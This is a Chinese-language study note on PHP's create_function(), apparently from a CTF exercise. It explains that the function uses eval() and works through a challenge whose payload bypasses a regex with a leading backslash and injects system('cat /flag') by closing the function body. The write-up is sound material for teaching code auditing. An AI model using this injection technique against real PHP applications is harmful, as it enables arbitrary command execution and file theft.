最近做题发现有利用到这个函数,所以就找了这篇文章学习了一下,并做个笔记
适用范围 : php < 7.2 7.2也有不过会有报错
语法:
create_function(string $args, string $code) string $args 声明的函数变量部分 string $code 执行的方法代码部分
用法:
<?php
$newfunc = create_function('$a, $b', 'return "ln($a) + ln($b) = " . log($a * $b)');
echo "New anonymous function: $newfunc \n"
echo $newfunc(2, M_E) . "\n";
?>
分析:
create_function
函数会创建一个匿名函数。在此处回创建一个叫 lamvda_1
的函数,在第一个 echo
中显示名字,并在第二个 echo
语句中执行该函数。
create_function
函数会在内部执行eval()
,在实现过程中会发现是执行了后面的return
语句,它属于create_function()
中的第二个参数string $code
的位置
因此上面创建的函数等价于:
<?php
function lambda_1($a, $b) {
return "ln($a) + ln($b) = " . log($a * $b);
}
这个函数在代码审计中也是一个漏洞利用函数
例子
<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
if (preg_match('/^[a-z0-9_]*$/isD', $a)) {
show_source(__FILE__);
}
else {
$a('', $b);
}
直接说答案了,我们要传的payload为
a=\create_function&b=}system('cat /flag'); /*
接着我来解释一下这句的意思,以及为什么这么写
首先把相应参数数据传入后,该语句就会变成
\create_function('',"}system('cat /flag'); /*")
首先因为正则的关系,我们不能以字母会数字开头,所以我们可以用\
符号开头,它不会影响函数的运行
而转化为create_function
创建的函数就会变成
<?php
function lambda_1() {
}system('cat /flag');
/*}
我们用}
开头为的就是进行闭合,这样我们可以进行我们想执行的代码,而后面的/*
为的是把原本的}
符号给注释掉,这样我们就执行了system('cat /flag')
函数